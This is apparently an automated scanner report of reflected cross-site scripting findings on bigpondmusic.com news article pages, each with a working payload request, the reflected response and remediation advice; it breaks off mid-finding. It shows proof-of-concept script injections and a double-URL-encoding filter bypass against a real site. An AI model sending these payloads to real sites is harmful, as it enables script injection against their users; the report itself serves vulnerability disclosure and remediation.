HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88274
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce4a'%3b8478f30dab6 was submitted in the REST URL parameter 1. This input was echoed as 8ce4a';8478f30dab6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8ce4a'%3b8478f30dab6/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e081bde27c65 was submitted in the REST URL parameter 2. This input was echoed as 61cdc"><script>alert(1)</script>081bde27c65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article61cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e081bde27c65/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88044
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dc9d'%3b6f3698c74c8 was submitted in the REST URL parameter 2. This input was echoed as 1dc9d';6f3698c74c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/article1dc9d'%3b6f3698c74c8/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87990
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29522%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527736eba7615e was submitted in the REST URL parameter 4. This input was echoed as 29522'style='x:expression(alert(1))'736eba7615e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child29522%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527736eba7615e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103304
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Jay-Z opens up about shootin ...[SNIP]... <link rel='canonical' href='http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child29522'style='x:expression(alert(1))'736eba7615e' /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cdca9587b7 was submitted in the REST URL parameter 4. This input was echoed as f3e3f"><script>alert(1)</script>2cdca9587b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-childf3e3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cdca9587b7 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103355
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Jay-Z opens up about shootin ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-childf3e3f"><script>alert(1)</script>2cdca9587b7" /> ...[SNIP]...
2.355. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54bba"style%3d"x%3aexpression(alert(1))"aa54df856a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54bba"style="x:expression(alert(1))"aa54df856a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child?54bba"style%3d"x%3aexpression(alert(1))"aa54df856a=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103316
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Jay-Z opens up about shootin ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child?54bba"style="x:expression(alert(1))"aa54df856a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2942c'%3b09aa9546100 was submitted in the REST URL parameter 1. This input was echoed as 2942c';09aa9546100 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2942c'%3b09aa9546100/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88170
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d613c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef452a1d72c7 was submitted in the REST URL parameter 1. This input was echoed as d613c"><script>alert(1)</script>f452a1d72c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /newsd613c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef452a1d72c7/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88138
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e486%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c24b6ca955 was submitted in the REST URL parameter 2. This input was echoed as 3e486"><script>alert(1)</script>7c24b6ca955 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article3e486%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c24b6ca955/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88515
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e086'%3b7d3006b93d9 was submitted in the REST URL parameter 2. This input was echoed as 2e086';7d3006b93d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/article2e086'%3b7d3006b93d9/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87984
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1e0da%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ed7bd17400c was submitted in the REST URL parameter 4. This input was echoed as 1e0da'style='x:expression(alert(1))'ed7bd17400c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list1e0da%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ed7bd17400c HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 311459
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b02%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e31b5d1e0361 was submitted in the REST URL parameter 4. This input was echoed as 29b02"><script>alert(1)</script>31b5d1e0361 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list29b02%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e31b5d1e0361 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 311872
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.362. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80616"style%3d"x%3aexpression(alert(1))"94e4edbecb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80616"style="x:expression(alert(1))"94e4edbecb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list?80616"style%3d"x%3aexpression(alert(1))"94e4edbecb9=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 311124
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a4b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e914b3f2cd5a was submitted in the REST URL parameter 1. This input was echoed as 1a4b3"><script>alert(1)</script>914b3f2cd5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
